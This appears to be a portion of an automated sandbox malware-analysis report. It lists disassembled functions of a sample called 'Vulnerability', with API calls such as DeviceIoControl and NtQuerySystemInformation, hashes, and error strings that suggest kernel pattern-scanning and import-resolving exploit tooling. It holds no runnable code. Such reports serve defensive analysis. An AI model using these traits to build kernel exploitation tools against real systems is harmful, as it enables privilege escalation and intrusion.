                                                                                          • Instruction Fuzzy Hash: A6514672608A8181EF61EF1AD5D0238EBA0EF44FA9BA5C571CE8E43761CF3DE5468310
                                                                                          Function 00007FF7CC417C70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememcmp
                                                                                          • String ID: 0$[-] Can't find section$[-] Can't read module headers
                                                                                          • API String ID: 3070867233-813957328
                                                                                          • Opcode ID: f9ac27eec31af94f4a33965b90ed7a46de1e451c401fcb3802898bd7dce6e1ae
                                                                                          • Instruction ID: e505aad65220157125dae13d6b82d283a35120affa38918d944f61463eddac8e
                                                                                          • Opcode Fuzzy Hash: f9ac27eec31af94f4a33965b90ed7a46de1e451c401fcb3802898bd7dce6e1ae
                                                                                          • Instruction Fuzzy Hash: DE51A432A187C681DB209F15E4402BAEBA4FF857A8FA48135EADD43799DF7CD681C710
                                                                                          Function 00007FF7CC417B00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC417B7F
                                                                                            • Part of subcall function 00007FF7CC415E00: DeviceIoControl.KERNEL32 ref: 00007FF7CC415E9B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417C28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememset
                                                                                          • String ID: [-] Can't find pattern$[-] Can't find pattern, Too big section$[-] No module address to find pattern$[-] Read failed in FindPatternAtKernel
                                                                                          • API String ID: 1687902784-521562947
                                                                                          • Opcode ID: 58557a54fd5ba6f0c641e890c273fe0d465d7dad3583469940d1ef5fc8e8662b
                                                                                          • Instruction ID: 00eef32dd26c053e8512a3922735d43997a05a91835eee85c32566942df6db5a
                                                                                          • Opcode Fuzzy Hash: 58557a54fd5ba6f0c641e890c273fe0d465d7dad3583469940d1ef5fc8e8662b
                                                                                          • Instruction Fuzzy Hash: CC41AF61E086C640FA21AF11A8112B9EE61AF45BFCFE5C131ED8D07696EE3CE7458220
                                                                                          Function 00007FF7CC4234F0 Relevance: 12.2, APIs: 8, Instructions: 160COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423529
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423551
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235B8
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235E1
                                                                                          • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423601
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC42364A
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423691
                                                                                          • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4236D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@$?sbumpc@?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 2679766405-0
                                                                                          • Opcode ID: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
                                                                                          • Instruction ID: 123419c217040758bac1cfc9929ff01747a387243699e1e2f8191fde779d8e3e
                                                                                          • Opcode Fuzzy Hash: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
                                                                                          • Instruction Fuzzy Hash: F851A511A0D6C140EA7A6F255502578EEBA9F11BBCF98C131DEAD07795CE3CE696C330
                                                                                          Function 00007FF7CC423080 Relevance: 12.1, APIs: 8, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC4230C1
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4230E0
                                                                                          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4230FF
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC423133
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC423152
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42319B
                                                                                          • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC4231D4
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423529
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423551
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235B8
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC42364A
                                                                                            • Part of subcall function 00007FF7CC419EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                            • Part of subcall function 00007FF7CC419EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42327A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$?sgetc@?$basic_streambuf@$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                          • String ID:
                                                                                          • API String ID: 777851723-0
                                                                                          • Opcode ID: 03f68eefe71560afad815622e936b20e62a4eb20abc6b3b2f71170b9959fe72f
                                                                                          • Instruction ID: 3088cb0f4e395c8ab3b325aa9318e3c55b6f296f8c8fe5d5d65916a935277a3b
                                                                                          • Opcode Fuzzy Hash: 03f68eefe71560afad815622e936b20e62a4eb20abc6b3b2f71170b9959fe72f
                                                                                          • Instruction Fuzzy Hash: 54616E32618BC18ADB10DF64E4812AEBB71FB85B58F548126EB8C83B59DF7DD605CB10
                                                                                          Function 00007FF7CC41E8A0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 182COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EA56
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EAB1
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EB2F
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                            • Part of subcall function 00007FF7CC416440: VirtualAlloc.KERNEL32 ref: 00007FF7CC4165FA
                                                                                            • Part of subcall function 00007FF7CC416440: VirtualFree.KERNEL32 ref: 00007FF7CC41662E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$V01@$Free$??6?$basic_ostream@AllocControlD@std@@@std@@DeviceInformationQuerySystemU?$char_traits@V01@@$_invalid_parameter_noinfo_noreturnmemset
                                                                                          • String ID: wasn't found$[-] Dependency $[-] Failed to resolve import
                                                                                          • API String ID: 2919487795-3042260135
                                                                                          • Opcode ID: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                                                          • Instruction ID: 734af6e615bd44ebf500932a2c39d22d44f7ee2f293ba658f341bf7312e38c08
                                                                                          • Opcode Fuzzy Hash: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                                                          • Instruction Fuzzy Hash: 3C61B0A5B05BC281EE14FF12E4195B9ABA5AF45FE8BD4C436CE8D07756DE3CE2418320
                                                                                          Function 00007FF7CC4190E0 Relevance: 10.7, APIs: 7, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: fgetc
                                                                                          • String ID:
                                                                                          • API String ID: 2807381905-0
                                                                                          • Opcode ID: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                                                          • Instruction ID: dc4c869bfeac60190332baac964abdbb66a7c58f8318b49bf7a0ddcf3344b142
                                                                                          • Opcode Fuzzy Hash: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                                                          • Instruction Fuzzy Hash: 22816D32B14A8199EB10DF65D4802AC7BB0FB58778FA88636DE5D53B94DF38D694C320
                                                                                          Function 00007FF7CC41D050 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                                                          • Instruction ID: a782842a5b7f5f9d9ac29abc2c3223486341f3b890c41cdfee59f43ecda1ee17
                                                                                          • Opcode Fuzzy Hash: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                                                          • Instruction Fuzzy Hash: 9A51BF62E08BD191EE15AF25D504278A7A0FB55BB8FA48631DEBC033C1DF78E294C350
                                                                                          Function 00007FF7CC41CAF0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@W@std@@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 3972169111-0
                                                                                          • Opcode ID: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                                                          • Instruction ID: a6c349051a8edec77f2fd027b00a9715b21c68b19fae86464c9734532da7cedd
                                                                                          • Opcode Fuzzy Hash: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                                                          • Instruction Fuzzy Hash: 6C317222B08BC181EB14AF15F840169BB60FB88FB8F988631DA9D577A5DF3CE651C710
                                                                                          Function 00007FF7CC41A2B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskD@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 3790006010-0
                                                                                          • Opcode ID: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                                                          • Instruction ID: aa80dfeb54bf9f34787c97d9cbcbaaeef45938765e8840bc6e6b1e28d5aaeae5
                                                                                          • Opcode Fuzzy Hash: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                                                          • Instruction Fuzzy Hash: 89318422608BC581EB14AF11E440269FB71FB88FA8F988631DA8D07769DF3CE691C710
                                                                                          Function 00007FF7CC41C7A0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                          • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                          • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                          • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                          • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41C8A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 762505753-0
                                                                                          • Opcode ID: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                                                          • Instruction ID: b9c743f024004d4c8483a2dacd3a4c32e88a0e77c89c56a042ff7abebed04a5e
                                                                                          • Opcode Fuzzy Hash: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                                                          • Instruction Fuzzy Hash: 0A316622A08BC581EB54AF15E840169BB70FB88FE8F988631DA9D17765DF3CD651C710
                                                                                          Function 00007FF7CC422770 Relevance: 9.1, APIs: 6, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2171940698-0
                                                                                          • Opcode ID: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                                                          • Instruction ID: 249f0b318877ebc518a1eaabf0849d4bfb7a915f348a56ee3cf5ae6c4ee9ed63
                                                                                          • Opcode Fuzzy Hash: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                                                          • Instruction Fuzzy Hash: E541E261B08AC181EA20EF12A545269EB91FB48BF8F948735EE5D07BC9DE3CD241C320
                                                                                          Function 00007FF7CC41CEA0 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CF94
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFA2
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFDB
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFE5
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFF3
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41D028
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: bc8abc273c11127fba4228d0bbd46c9ef2122486e7f3ce02c55010bcfa240a1c
                                                                                          • Instruction ID: dea467adadb2484fef41358b726d00b4eb60803f8b9e29eedd44730b4fc83a0c
                                                                                          • Opcode Fuzzy Hash: bc8abc273c11127fba4228d0bbd46c9ef2122486e7f3ce02c55010bcfa240a1c
                                                                                          • Instruction Fuzzy Hash: E741C562B1968685EE20AF11A904369EB51FB44FE8FA48631DE9D4B7C5DE7CD241C320
                                                                                          Function 00007FF7CC41D760 Relevance: 9.1, APIs: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: e73c8f904c68ff8df5cce68e1b0e3e6e5580f034efab5d34fbc6d5a17bcb3d93
                                                                                          • Instruction ID: 80bd4dec96e6dd195c37d213c45afbbab8231efec9be634861247cf389fe5264
                                                                                          • Opcode Fuzzy Hash: e73c8f904c68ff8df5cce68e1b0e3e6e5580f034efab5d34fbc6d5a17bcb3d93
